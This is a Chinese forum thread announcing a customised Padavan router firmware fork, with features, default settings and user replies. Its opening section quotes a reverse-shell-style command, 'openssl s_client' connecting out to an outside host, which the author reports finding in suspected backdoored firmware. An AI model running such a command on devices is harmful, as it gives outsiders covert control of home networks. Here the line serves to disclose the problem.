Yonsm 发表于 2019-9-11 22:10

精工细作的 Padavan 固件(K2P、Newifi3、Newifi-Mini、小娱C1/C5支持SATA啦)

一、来由

最近偶尔发现家里的路由器 CPU 100%,开了openssl s_client 连接到它发布页相同的域名(openssl s_client -quiet -connect ...),这是一个典型的反弹shell的用法,可能是后门。之前至少有两个人报过同样的问题(参见1、参见2);另外似乎有其它人的固件在连接“openssl s_client -quiet -connect koolproxy.com 443”。闭源不按规则出牌的做法之前已经被诟病不少,作为家庭网络中枢的路由器被安置后门更是难受。

最近 fork 了 hanwckf 的 Padavan 代码,按照自己的喜好一通大改,看着终于比较舒服了:

[*]大量的 UI 细节改动:如 DIY 了 logo 和 favicon、翻译词条、以及其它细节等;
[*]客户端状态页面,支持显示 WIFI 信号强度 RSSI,点击标题栏支持按名称、IP、MAC、RSSI排序;
[*]支持小娱 XY-C1 配置,全面去除 WIFI 相关的管理页面;
[*]右上角工具按钮及图标优化,支持关机按钮;
[*]好多其它修改,暂时懒得码字了,看git分支和提交记录吧。

二、图示

以下为小娱C1的固件,我测试的去掉了SATA,现在2020.01.08版本支持内置SATA啦:

以下为K2P纯净固件,集成了5.0.3的驱动,适用于用作AP(实际发布的含$$):

三、使用

我编译了 K2P、Newifi3、Newifi-Mini、小娱C1/C5 的固件,自己测试中,不保证稳定性和质量(基本与hanwckf一致),下载地址:

https://github.com/Yonsm/Padavan/releases

默认配置如下:
主机名:Router
WIFI:设备型号_标识/1234567890
账号:admin/admin

其它大部分功能功能和参考 hanwckf 一致,参考他的文章,特别是其中 $$ 的部分需要仔细特别关注。

其它固件或需要修改功能,可以自行下载源代码编译:https://github.com/Yonsm/Padavan

四、后续

欢迎大家反馈使用、反馈,后面还会继续完善。也欢迎 fork 和 PR,上述部分修改(如RSSI排序、关机按钮等好多功能已PR给hanwckf并被合并,如果不需要我那些个性化的东西,也可以使用他的代码库,但我的在界面细节等方面比他更考究点:)。

附:XY-C1换了小的亚克力盒子,漂亮啊,看图:

hanwckf 发表于 2019-9-11 22:16

好,不错不错

mjyhj 发表于 2019-9-11 22:36

驱动是5030吗

ian1900 发表于 2019-9-11 22:51

很不错,厉害!

天生的心 发表于 2019-9-11 23:15

ipv6支持吗

rush 发表于 2019-9-11 23:33

是以前xcmd的作者么?

Yonsm 发表于 2019-9-11 23:36

rush 发表于 2019-9-11 23:33
是以前xcmd的作者么?

呃……是的。以前无忧捣腾的XCMD/WinCMD,老九拿去改成了PECMD成了后续好长一段时间各种PE的Shell Loader和工具脚本环境,我自己后续演进成了 CeleScript 去掉了 PE Shell Loader功能,也备存在这里了:https://github.com/Yonsm/CeleScript

a88244786 发表于 2019-9-12 00:04

这个固件可以加入 网易云插件吗 嘿嘿

xiaoqing 发表于 2019-9-12 01:16

战略mark

rush 发表于 2019-9-12 07:57

Yonsm 发表于 2019-9-11 23:36
呃……是的。以前无忧捣腾的XCMD/WinCMD ,老九拿去改成了PECMD成了后续好长一段时间各种PE的Shell Loade ...

当时很受不了*九*桃的所作所为,后来开源的PECMD2012出来他们也自然淘汰。
我以前有用过wince的机器,用xcmd写了很多脚本,现在也无情淘汰,还是研究linux,研究成果比较持久。

Yonsm 发表于 2019-9-12 08:03

rush 发表于 2019-9-12 07:57
当时很受不了*九*桃的所作所为,后来开源的PECMD2012出来他们也自然淘汰。
我以前有用过wince的机器,用 ...

妈呀,你不说我都忘了WM中的才叫XCMD…,这个后面我改成了CeleCmd,代码备存在:https://github.com/Yonsm/CeleCmd,大趋势如此,青山遮不住,哈哈,虽然没什么用了,存个档。

chaohua27 发表于 2019-9-12 09:04

支持卤煮,加油!

猜破天机 发表于 2019-9-12 09:18

支持一下

hzjnet@163.com 发表于 2019-9-12 09:44

谢谢分享;请教下:在 该padavan下的linux-3.4内核目录下make menuconfig能设置mesh参数但是一编译就恢复初始值了,应该如何修改哪个文件才对啊? 再请教上网的R如何开启源码中的哪个配置文件哪个选项喃?谢谢:)

samyi 发表于 2019-9-12 11:03

以前楼主是不是有个与你的用户名Yonsm同名的博客:lol,后来不能访问了,认得你的github主页头像:lol后面会不会加个QOS呢,平常还是用得上的
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: 精工细作的 Padavan 固件(K2P、Newifi3、Newifi-Mini、小娱C1/C5支持SATA啦)